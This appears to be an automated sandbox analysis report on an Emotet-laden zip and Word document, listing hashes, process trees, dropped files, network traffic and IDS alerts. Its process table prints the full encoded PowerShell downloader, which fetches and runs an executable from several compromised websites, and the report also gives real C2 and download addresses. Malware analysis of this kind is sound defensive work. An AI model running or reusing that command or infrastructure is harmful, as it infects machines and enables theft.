File name: | sample.zip |
Full analysis: | https://app.any.run/tasks/14b6d08b-6320-4556-b903-5d0f4b1950e5 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 18, 2019, 19:38:51 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 3C7C4B5A1298D0DEA98F8BF3AAC5AACA |
SHA1: | 33EB24DEC25563A66C6AF955DBBF3D0FFB293988 |
SHA256: | A02EA75848580682D7BBAECB3B4FD991BE2C46832F42DAF9328DD3EEC0825664 |
SSDEEP: | 3072:6izzJ0qG9pIc6jf1JV0M2lduW0x3zCtbuY3NVoCYcS+ULMHA7/uH:fsAcqV0t01x3dY3UCYP+SuH |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 788 |
---|---|
ZipBitFlag: | 0x0001 |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:09:18 19:38:13 |
ZipCRC: | 0x8d43e14d |
ZipCompressedSize: | 167288 |
ZipUncompressedSize: | 329792 |
ZipFileName: | 2fc714f53a8a70cb55710477b662cf89039b83279fc24ab34a1e862dcfd926b5.bin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2988 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\sample.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
2540 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\whoopi.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2520 | powershell -encod JAB6AEcASgA0AG4ASgA9ACcAbAB2ADMAdwBLADkAMQA3ACcAOwAkAEwASgB1AEYAcgAzACAAPQAgACcAOAAzADUAJwA7ACQAVQBQAEsAcgB3AGEAUAA9ACcAcQBiAG8AYwBPAFMAQwAnADsAJAByAHIANQBLAFIAdQB3ADEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEwASgB1AEYAcgAzACsAJwAuAGUAeABlACcAOwAkAHoARQB1AEQAaQBCAEIAMAA9ACcATgBVAHoAUABvAGIAQgBCACcAOwAkAFgAdABfAE0AdwBxAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcARQBiAGMATABJAGUATgB0ADsAJABkAGoANgBkAG0AcgA9ACcAaAB0AHQAcAA6AC8ALwB0AGgAaQBuAGgAdgB1AG8AbgBnAG0AZQBkAGkAYQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbgAyAGsAZQBlAHAANwAvAEAAaAB0AHQAcABzADoALwAvAG0AbgBwAGEAcwBhAGwAdQBiAG8AbgBnAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBuAHMAbQB6ADkAYQB6ADAAMwAyAC8AQABoAHQAdABwADoALwAvAHQAcgB1AG4AZwBhAG4AaAAuAHgAeQB6AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAegBxADUAMAAvAEAAaAB0AHQAcABzADoALwAvAGkAcAB0AGkAdgBpAGMAaQBuAGkALgBjAG8AbQAvAG4AcABrAHgALwBqAHcAcAB5ADkAMwA4AC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBjAGUAegBhAGUAdgBpAG4AZQBnAG8AbgBkAGUAcgAuAGMAbwBtAC8AYwBvAG4AZgAvAGYAZAA0ADUALwAnAC4AIgBTAHAAbABgAEkAVAAiACgAJwBAACcAKQA7ACQAVABkAFgAbgBpADAAUgA9ACcAZAA0ADcAaQBNADQAMAAnADsAZgBvAHIAZQBhAGMAaAAoACQAbwBqAGoAVQBUAG8AagBCACAAaQBuACAAJABkAGoANgBkAG0AcgApAHsAdAByAHkAewAkAFgAdABfAE0AdwBxAC4AIgBkAG8AdwBOAEwAYABPAEEAYABEAGYAYABpAEwARQAiACgAJABvAGoAagBVAFQAbwBqAEIALAAgACQAcgByADUASwBSAHUAdwAxACkAOwAkAG4ASgBxAHcAOABYAFEAPQAnAEoAQQBBAE4AUQBPADMAVwAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAHIAcgA1AEsAUgB1AHcAMQApAC4AIgBMAGUAbgBHAGAAVABoACIAIAAtAGcAZQAgADIAOQA4ADAANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJAByAHIANQBLAFIAdQB3ADEAKQA7ACQAZABmAHYANQBqADUAPQAnAG8AbgBYAHAAdgBxACcAOwBiAHIAZQBhAGsAOwAkAGwAagBqAEEAWABMADAAPQAnAFUAVwBtAHIAcgAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGkAdwBRAFkAdwBQAD0AJwB3AGgAWAB6AFYAUABpACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3132 | "C:\Users\admin\835.exe" | C:\Users\admin\835.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2376 | "C:\Users\admin\835.exe" | C:\Users\admin\835.exe | — | 835.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2460 | --f0e46278 | C:\Users\admin\835.exe | — | 835.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3320 | --f0e46278 | C:\Users\admin\835.exe | 835.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2852 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | 835.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3764 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3852 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRFD41.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2540 | WINWORD.EXE | C:\Users\admin\Desktop\~$whoopi.doc | pgc | |
MD5:0B5B20AAA39423354260896090B18DA0 | SHA256:0CD1837408715F5104FB0FF018E5A53F980FE6DD7964350EBCFD48CF1EC78561 | |||
2540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1135159C.wmf | wmf | |
MD5:EA2C6C72A005B2A2FF40D34F251739B5 | SHA256:7F4E618B86C10154CF693C508885F2C069DCAD54EAA90D085DEE1B1C483566AC | |||
2540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2EE6E847.wmf | wmf | |
MD5:01919F45764FBE382D9043FFC1338F7E | SHA256:6EA3DDC3B7200A1BA4911EB219A50AEB1A5182D599197B30AB87339FEB291D88 | |||
2540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D0AA6311.wmf | wmf | |
MD5:8E6DEF5B61985AAA923C8E4E256082EC | SHA256:D54FC5860A92CD9FEDF3A1A3A83876C60EF282C3729C5625FC97BDEAA52452EC | |||
2988 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb2988.5561\2fc714f53a8a70cb55710477b662cf89039b83279fc24ab34a1e862dcfd926b5.bin | document | |
MD5:DDD84921602FF5CB88CE0A42434BA2AD | SHA256:2FC714F53A8A70CB55710477B662CF89039B83279FC24AB34A1E862DCFD926B5 | |||
2540 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:F7FDF06AB965DA9170A528344BA4C7EF | SHA256:D446A6AFA4ACEB7FAEDB643BC79B48343B2E21F11ACD78699E1BDB123B792892 | |||
2540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\228A40ED.wmf | wmf | |
MD5:5C4F83E134A72503FCF81E7E63F4F4AD | SHA256:E6B63B63938C82998B52AB441245F483F24AF2CAE8C6CC60DBF4A5E8CB491F7D | |||
2540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\302A4BCB.wmf | wmf | |
MD5:4F9623B6E4D73C98B6EE1D305B894DF0 | SHA256:E01D16C354DA14EF703AC03757CA38E974A5AA6A89D36D8F4FD9A03C2D05FFF5 | |||
2540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\22532F6.wmf | wmf | |
MD5:DE197151BB276DD35A818075CF863EF5 | SHA256:C36348D8BC1DAA6EC4809CED1FBA514BE5EC02DF4584AB961633EA5FDE0AD393 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2520 | powershell.exe | GET | 200 | 124.158.6.218:80 | http://thinhvuongmedia.com/wp-admin/n2keep7/ | VN | executable | 512 Kb | suspicious |
2684 | easywindow.exe | POST | 200 | 114.79.134.129:443 | http://114.79.134.129:443/bml/attrib/ringin/merge/ | IN | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 114.79.134.129:443 | — | D-Vois Broadband Pvt Ltd | IN | malicious |
2520 | powershell.exe | 124.158.6.218:80 | thinhvuongmedia.com | CMC Telecommunications Services Company | VN | suspicious |
Domain | IP | Reputation |
---|---|---|
thinhvuongmedia.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2520 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2520 | powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
2520 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2520 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2684 | easywindow.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
2684 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2684 | easywindow.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |